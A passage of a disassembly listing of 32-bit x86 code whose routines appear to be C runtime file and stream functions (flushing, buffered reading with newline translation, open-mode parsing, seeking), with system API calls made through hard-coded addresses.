loc_41B412: ; CODE XREF: sub_41B397+77�j
push edi
call sub_41E368
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41B42D
push ebp
call sub_41C91A
pop ecx
jmp short loc_41B442
; ---------------------------------------------------------------------------
loc_41B42D: ; CODE XREF: sub_41B397+8B�j
xor eax, eax
jmp short loc_41B445
; ---------------------------------------------------------------------------
loc_41B431: ; CODE XREF: sub_41B397+E�j
; sub_41B397+2F�j
and dword_515888, 0
mov dword_515884, 9
loc_41B442: ; CODE XREF: sub_41B397+94�j
or eax, 0FFFFFFFFh
loc_41B445: ; CODE XREF: sub_41B397+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41B397 endp
; =============== S U B R O U T I N E =======================================
sub_41B44A proc near ; CODE XREF: sub_4180DC+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41B473
test al, 8
jz short loc_41B473
push dword ptr [esi+8]
call sub_417C62
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41B473: ; CODE XREF: sub_41B44A+A�j
; sub_41B44A+E�j
pop esi
retn
sub_41B44A endp
; =============== S U B R O U T I N E =======================================
sub_41B475 proc near ; CODE XREF: sub_41B515+2D�p
; sub_41B515+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_41B487
push esi
call sub_41B515
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B487: ; CODE XREF: sub_41B475+7�j
push esi
call sub_41B4B0
test eax, eax
pop ecx
jz short loc_41B497
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B497: ; CODE XREF: sub_41B475+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41B4AC
push dword ptr [esi+10h]
call sub_41E41F
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_41B4AC: ; CODE XREF: sub_41B475+26�j
xor eax, eax
pop esi
retn
sub_41B475 endp
; =============== S U B R O U T I N E =======================================
sub_41B4B0 proc near ; CODE XREF: sub_4180DC+1A�p
; sub_4183EE+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41B4FD
test ax, 108h
jz short loc_41B4FD
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41B4FD
push edi
push eax
push dword ptr [esi+10h]
call sub_41BE4F
add esp, 0Ch
cmp eax, edi
jnz short loc_41B4F6
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41B4FD
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41B4FD
; ---------------------------------------------------------------------------
loc_41B4F6: ; CODE XREF: sub_41B4B0+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41B4FD: ; CODE XREF: sub_41B4B0+14�j
; sub_41B4B0+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41B4B0 endp
; =============== S U B R O U T I N E =======================================
sub_41B50C proc near ; CODE XREF: sub_41D677�p
push 1
call sub_41B515
pop ecx
retn
sub_41B50C endp
; =============== S U B R O U T I N E =======================================
sub_41B515 proc near ; CODE XREF: sub_41B475+A�p
; sub_41B50C+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword_516B60, esi
jle short loc_41B573
loc_41B526: ; CODE XREF: sub_41B515+5C�j
mov eax, dword_515B4C
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41B56A
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41B56A
cmp [esp+0Ch+arg_0], 1
jnz short loc_41B550
push eax
call sub_41B475
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41B56A
inc ebx
jmp short loc_41B56A
; ---------------------------------------------------------------------------
loc_41B550: ; CODE XREF: sub_41B515+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_41B56A
test cl, 2
jz short loc_41B56A
push eax
call sub_41B475
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41B56A
or edi, eax
loc_41B56A: ; CODE XREF: sub_41B515+1B�j
; sub_41B515+23�j ...
inc esi
cmp esi, dword_516B60
jl short loc_41B526
loc_41B573: ; CODE XREF: sub_41B515+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_41B57E
mov eax, edi
loc_41B57E: ; CODE XREF: sub_41B515+65�j
pop edi
pop esi
pop ebx
retn
sub_41B515 endp
; =============== S U B R O U T I N E =======================================
sub_41B582 proc near ; CODE XREF: sub_418132+A9�p
; sub_4186EC+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41B656
test al, 40h
jnz loc_41B656
test al, 2
jz short loc_41B5A8
or al, 20h
mov [esi+0Ch], eax
jmp loc_41B656
; ---------------------------------------------------------------------------
loc_41B5A8: ; CODE XREF: sub_41B582+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41B5BC
push esi
call sub_41D568
pop ecx
jmp short loc_41B5C1
; ---------------------------------------------------------------------------
loc_41B5BC: ; CODE XREF: sub_41B582+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41B5C1: ; CODE XREF: sub_41B582+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41B65B
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41B645
cmp eax, 0FFFFFFFFh
jz short loc_41B645
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41B61A
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41B603
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword_516B80[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41B608
; ---------------------------------------------------------------------------
loc_41B603: ; CODE XREF: sub_41B582+6B�j
mov edi, offset dword_43BAD0
loc_41B608: ; CODE XREF: sub_41B582+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41B61A
or dh, 20h
mov [esi+0Ch], edx
loc_41B61A: ; CODE XREF: sub_41B582+62�j
; sub_41B582+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41B637
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41B637
test ch, 4
jnz short loc_41B637
mov dword ptr [esi+18h], 1000h
loc_41B637: ; CODE XREF: sub_41B582+9F�j
; sub_41B582+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B645: ; CODE XREF: sub_41B582+55�j
; sub_41B582+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41B656: ; CODE XREF: sub_41B582+A�j
; sub_41B582+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41B582 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B65B proc near ; CODE XREF: sub_418132+90�p
; sub_41B582+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, dword_516C80
jnb loc_41B838
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:516B80h[eax*4]
mov eax, dword_516B80[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41B838
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41B710
test dl, 2
jnz short loc_41B710
test dl, 48h
jz short loc_41B6D0
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41B6D0
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41B6D0: ; CODE XREF: sub_41B65B+56�j
; sub_41B65B+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
nop
call near ptr 7C80180Eh
test eax, eax
jnz short loc_41B723
nop
call near ptr 7C910331h
push 5
pop ecx
cmp eax, ecx
jnz short loc_41B70B
mov dword_515884, 9
mov dword_515888, ecx
jmp loc_41B849
; ---------------------------------------------------------------------------
loc_41B70B: ; CODE XREF: sub_41B65B+99�j
cmp eax, 6Dh
jnz short loc_41B717
loc_41B710: ; CODE XREF: sub_41B65B+4C�j
; sub_41B65B+51�j
xor eax, eax
jmp loc_41B84C
; ---------------------------------------------------------------------------
loc_41B717: ; CODE XREF: sub_41B65B+B3�j
push eax
call sub_41C91A
pop ecx
jmp loc_41B849
; ---------------------------------------------------------------------------
loc_41B723: ; CODE XREF: sub_41B65B+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41B833
test edx, edx
jz short loc_41B748
cmp byte ptr [edi], 0Ah
jnz short loc_41B748
or al, 4
jmp short loc_41B74A
; ---------------------------------------------------------------------------
loc_41B748: ; CODE XREF: sub_41B65B+E2�j
; sub_41B65B+E7�j
and al, 0FBh
loc_41B74A: ; CODE XREF: sub_41B65B+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41B82D
loc_41B762: ; CODE XREF: sub_41B65B+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41B81D
cmp al, 0Dh
jz short loc_41B77E
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41B80F
; ---------------------------------------------------------------------------
loc_41B77E: ; CODE XREF: sub_41B65B+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41B79C
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41B793
add [ebp+arg_8], 2
jmp short loc_41B7F1
; ---------------------------------------------------------------------------
loc_41B793: ; CODE XREF: sub_41B65B+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41B80F
; ---------------------------------------------------------------------------
loc_41B79C: ; CODE XREF: sub_41B65B+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
nop
call near ptr 7C80180Eh
test eax, eax
jnz short loc_41B7C4
nop
call near ptr 7C910331h
test eax, eax
jnz short loc_41B80B
loc_41B7C4: ; CODE XREF: sub_41B65B+15D�j
cmp [ebp+var_C], 0
jz short loc_41B80B
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41B7E6
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41B7F1
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41B80F
; ---------------------------------------------------------------------------
loc_41B7E6: ; CODE XREF: sub_41B65B+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41B7F6
cmp [ebp+var_1], 0Ah
jnz short loc_41B7F6
loc_41B7F1: ; CODE XREF: sub_41B65B+136�j
; sub_41B65B+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41B80E
; ---------------------------------------------------------------------------
loc_41B7F6: ; CODE XREF: sub_41B65B+18E�j
; sub_41B65B+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41BA39
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41B80F
loc_41B80B: ; CODE XREF: sub_41B65B+167�j
; sub_41B65B+16D�j
mov byte ptr [edi], 0Dh
loc_41B80E: ; CODE XREF: sub_41B65B+199�j
inc edi
loc_41B80F: ; CODE XREF: sub_41B65B+11E�j
; sub_41B65B+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41B762
jmp short loc_41B82D
; ---------------------------------------------------------------------------
loc_41B81D: ; CODE XREF: sub_41B65B+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41B82D
or al, 2
mov [esi], al
loc_41B82D: ; CODE XREF: sub_41B65B+101�j
; sub_41B65B+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41B833: ; CODE XREF: sub_41B65B+DA�j
mov eax, [ebp+var_8]
jmp short loc_41B84C
; ---------------------------------------------------------------------------
loc_41B838: ; CODE XREF: sub_41B65B+12�j
; sub_41B65B+39�j
and dword_515888, 0
mov dword_515884, 9
loc_41B849: ; CODE XREF: sub_41B65B+AB�j
; sub_41B65B+C3�j
or eax, 0FFFFFFFFh
loc_41B84C: ; CODE XREF: sub_41B65B+B7�j
; sub_41B65B+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B65B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B851 proc near ; CODE XREF: sub_41821A+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_515AFC
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_41B88A
cmp al, 72h
jz short loc_41B883
cmp al, 77h
jnz loc_41B99E
mov ecx, 301h
jmp short loc_41B88F
; ---------------------------------------------------------------------------
loc_41B883: ; CODE XREF: sub_41B851+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41B892
; ---------------------------------------------------------------------------
loc_41B88A: ; CODE XREF: sub_41B851+1D�j
mov ecx, 109h
loc_41B88F: ; CODE XREF: sub_41B851+30�j
or esi, 2
loc_41B892: ; CODE XREF: sub_41B851+37�j
push 1
pop edx
loc_41B895: ; CODE XREF: sub_41B851+8B�j
; sub_41B851+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_41B984
cmp edx, ebx
jz loc_41B984
movsx eax, al
cmp eax, 54h
jg short loc_41B923
jz short loc_41B913
sub eax, 2Bh
jz short loc_41B8FD
sub eax, 19h
jz short loc_41B8F3
sub eax, 0Eh
jz short loc_41B8DE
dec eax
jnz loc_41B975
cmp [ebp+var_4], ebx
jnz loc_41B975
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_41B895
; ---------------------------------------------------------------------------
loc_41B8DE: ; CODE XREF: sub_41B851+6F�j
cmp [ebp+var_4], ebx
jnz loc_41B975
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_41B895
; ---------------------------------------------------------------------------
loc_41B8F3: ; CODE XREF: sub_41B851+6A�j
test cl, 40h
jnz short loc_41B975
or ecx, 40h
jmp short loc_41B895
; ---------------------------------------------------------------------------
loc_41B8FD: ; CODE XREF: sub_41B851+65�j
test cl, 2
jnz short loc_41B975
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41B895
; ---------------------------------------------------------------------------
loc_41B913: ; CODE XREF: sub_41B851+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_41B975
or ecx, eax
jmp loc_41B895
; ---------------------------------------------------------------------------
loc_41B923: ; CODE XREF: sub_41B851+5E�j
sub eax, 62h
jz short loc_41B970
dec eax
jz short loc_41B959
sub eax, 0Bh
jz short loc_41B942
sub eax, 6
jnz short loc_41B975
test ch, 0C0h
jnz short loc_41B975
or ch, 40h
jmp loc_41B895
; ---------------------------------------------------------------------------
loc_41B942: ; CODE XREF: sub_41B851+DD�j
cmp [ebp+var_8], ebx
jnz short loc_41B975
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_41B895
; ---------------------------------------------------------------------------
loc_41B959: ; CODE XREF: sub_41B851+D8�j
cmp [ebp+var_8], ebx
jnz short loc_41B975
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_41B895
; ---------------------------------------------------------------------------
loc_41B970: ; CODE XREF: sub_41B851+D5�j
test ch, 0C0h
jz short loc_41B97C
loc_41B975: ; CODE XREF: sub_41B851+72�j
; sub_41B851+7B�j ...
xor edx, edx
jmp loc_41B895
; ---------------------------------------------------------------------------
loc_41B97C: ; CODE XREF: sub_41B851+122�j
or ch, 80h
jmp loc_41B895
; ---------------------------------------------------------------------------
loc_41B984: ; CODE XREF: sub_41B851+4A�j
; sub_41B851+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41E476
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41B9A2
loc_41B99E: ; CODE XREF: sub_41B851+25�j
xor eax, eax
jmp short loc_41B9BC
; ---------------------------------------------------------------------------
loc_41B9A2: ; CODE XREF: sub_41B851+14B�j
mov eax, [ebp+arg_C]
inc dword_515A34
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41B9BC: ; CODE XREF: sub_41B851+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B851 endp
; =============== S U B R O U T I N E =======================================
sub_41B9C1 proc near ; CODE XREF: sub_41821A�p
mov edx, dword_516B60
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41BA32
mov ebx, dword_515B4C
mov edi, ebx
loc_41B9DD: ; CODE XREF: sub_41B9C1+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_41B9F8
test byte ptr [ecx+0Ch], 83h
jz short loc_41B9F3
inc eax
add edi, 4
cmp eax, edx
jl short loc_41B9DD
jmp short loc_41BA32
; ---------------------------------------------------------------------------
loc_41B9F3: ; CODE XREF: sub_41B9C1+26�j
mov esi, [ebx+eax*4]
jmp short loc_41BA1C
; ---------------------------------------------------------------------------
loc_41B9F8: ; CODE XREF: sub_41B9C1+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_417BEE
pop ecx
mov ecx, dword_515B4C
mov [edi+ecx], eax
mov eax, dword_515B4C
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41BA32
mov esi, edi
loc_41BA1C: ; CODE XREF: sub_41B9C1+35�j
cmp esi, ebp
jz short loc_41BA32
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41BA32: ; CODE XREF: sub_41B9C1+12�j
; sub_41B9C1+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41B9C1 endp
; =============== S U B R O U T I N E =======================================
sub_41BA39 proc near ; CODE XREF: sub_4183EE+67�p
; sub_41922E+CD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, dword_516C80
push esi
push edi
jnb short loc_41BABB
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:516B80h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_41BABB
push eax
call sub_41E3E2
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41BA7D
mov dword_515884, 9
jmp short loc_41BACC
; ---------------------------------------------------------------------------
loc_41BA7D: ; CODE XREF: sub_41BA39+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
nop
call near ptr 7C810B8Eh
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41BA9D
nop
call near ptr 7C910331h
jmp short loc_41BA9F
; ---------------------------------------------------------------------------
loc_41BA9D: ; CODE XREF: sub_41BA39+5A�j
xor eax, eax
loc_41BA9F: ; CODE XREF: sub_41BA39+62�j
test eax, eax
jz short loc_41BAAC
push eax
call sub_41C91A
pop ecx
jmp short loc_41BACC
; ---------------------------------------------------------------------------
loc_41BAAC: ; CODE XREF: sub_41BA39+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_41BACF
; ---------------------------------------------------------------------------
loc_41BABB: ; CODE XREF: sub_41BA39+D�j
; sub_41BA39+2A�j
and dword_515888, 0
mov dword_515884, 9
loc_41BACC: ; CODE XREF: sub_41BA39+42�j
; sub_41BA39+71�j
or eax, 0FFFFFFFFh
loc_41BACF: ; CODE XREF: sub_41BA39+80�j
pop edi
pop esi
pop ebx
retn
sub_41BA39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BAD3 proc near ; CODE XREF: sub_4183EE+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41BAEF
mov [edi+4], ebx
loc_41BAEF: ; CODE XREF: sub_41BAD3+17�j
push 1
push ebx
push esi
call sub_41BA39
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41BB5D
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41BB14
sub eax, [edi+4]
jmp loc_41BC26
; ---------------------------------------------------------------------------
loc_41BB14: ; CODE XREF: sub_41BAD3+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_41BB4E
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, dword_516B80[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_41BB65
mov edx, ecx
loc_41BB3F: ; CODE XREF: sub_41BAD3+79�j
cmp edx, eax
jnb short loc_41BB65
cmp byte ptr [edx], 0Ah
jnz short loc_41BB4B
inc [ebp+var_8]
loc_41BB4B: ; CODE XREF: sub_41BAD3+73�j
inc edx
jmp short loc_41BB3F
; ---------------------------------------------------------------------------
loc_41BB4E: ; CODE XREF: sub_41BAD3+50�j
test dl, 80h
jnz short loc_41BB65
mov dword_515884, 16h
loc_41BB5D: ; CODE XREF: sub_41BAD3+2D�j
or eax, 0FFFFFFFFh
jmp loc_41BC26
; ---------------------------------------------------------------------------
loc_41BB65: ; CODE XREF: sub_41BAD3+68�j
; sub_41BAD3+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_41BB73
mov eax, [ebp+var_8]
jmp loc_41BC26
; ---------------------------------------------------------------------------
loc_41BB73: ; CODE XREF: sub_41BAD3+96�j
test byte ptr [edi+0Ch], 1
jz loc_41BC1E
mov edx, [edi+4]
test edx, edx
jnz short loc_41BB8C
and [ebp+var_8], edx
jmp loc_41BC1E
; ---------------------------------------------------------------------------
loc_41BB8C: ; CODE XREF: sub_41BAD3+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:516B80h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_41BC18
push 2
push 0
push [ebp+var_C]
call sub_41BA39
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41BBDF
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_41BBCA: ; CODE XREF: sub_41BAD3+104�j
cmp eax, ecx
jnb short loc_41BBD9
cmp byte ptr [eax], 0Ah
jnz short loc_41BBD6
inc [ebp+arg_0]
loc_41BBD6: ; CODE XREF: sub_41BAD3+FE�j
inc eax
jmp short loc_41BBCA
; ---------------------------------------------------------------------------
loc_41BBD9: ; CODE XREF: sub_41BAD3+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_41BC13
; ---------------------------------------------------------------------------
loc_41BBDF: ; CODE XREF: sub_41BAD3+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41BA39
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41BC06
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41BC06
test ch, 4
jz short loc_41BC09
loc_41BC06: ; CODE XREF: sub_41BAD3+124�j
; sub_41BAD3+12C�j
mov eax, [edi+18h]
loc_41BC09: ; CODE XREF: sub_41BAD3+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41BC13: ; CODE XREF: sub_41BAD3+10A�j
jz short loc_41BC18
inc [ebp+arg_0]
loc_41BC18: ; CODE XREF: sub_41BAD3+D9�j
; sub_41BAD3:loc_41BC13�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41BC1E: ; CODE XREF: sub_41BAD3+A4�j
; sub_41BAD3+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41BC26: ; CODE XREF: sub_41BAD3+3C�j
; sub_41BAD3+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41BAD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC2B proc near ; CODE XREF: sub_418743+47�p
; sub_418743+74�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4216A8
push offset sub_41D304
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_515904, edi
jnz short loc_41BCA1
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4216A0
mov esi, 100h
push esi
push edi
nop
call near ptr 7C80CCA8h
test eax, eax
jz short loc_41BC7F
mov dword_515904, ebx
jmp short loc_41BCA1
; ---------------------------------------------------------------------------
loc_41BC7F: ; CODE XREF: sub_41BC2B+4A�j
push edi
push edi
push ebx
push offset dword_441700
push esi
push edi
nop
call near ptr 7C838DE8h
test eax, eax
jz loc_41BDB9
mov dword_515904, 2
loc_41BCA1: ; CODE XREF: sub_41BC2B+2E�j
; sub_41BC2B+52�j
cmp [ebp+arg_C], edi
jle short loc_41BCB6
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4200BF
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_41BCB6: ; CODE XREF: sub_41BC2B+79�j
mov eax, dword_515904
cmp eax, 2
jnz short loc_41BCDD
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C838DE8h
jmp loc_41BDBB
; ---------------------------------------------------------------------------
loc_41BCDD: ; CODE XREF: sub_41BC2B+93�j
cmp eax, 1
jnz loc_41BDB9
cmp [ebp+arg_18], edi
jnz short loc_41BCF3
mov eax, dword_5158FC
mov [ebp+arg_18], eax
loc_41BCF3: ; CODE XREF: sub_41BC2B+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
nop
call near ptr 7C809BF8h
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_41BDB9
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_417B70
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41BD4E
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_41BD4E: ; CODE XREF: sub_41BC2B+10E�j
cmp [ebp+var_24], edi
jz short loc_41BDB9
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
nop
call near ptr 7C809BF8h
test eax, eax
jz short loc_41BDB9
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
nop
call near ptr 7C80CCA8h
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_41BDB9
test byte ptr [ebp+arg_4+1], 4
jz short loc_41BDCD
cmp [ebp+arg_14], edi
jz loc_41BE48
cmp esi, [ebp+arg_14]
jg short loc_41BDB9
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
nop
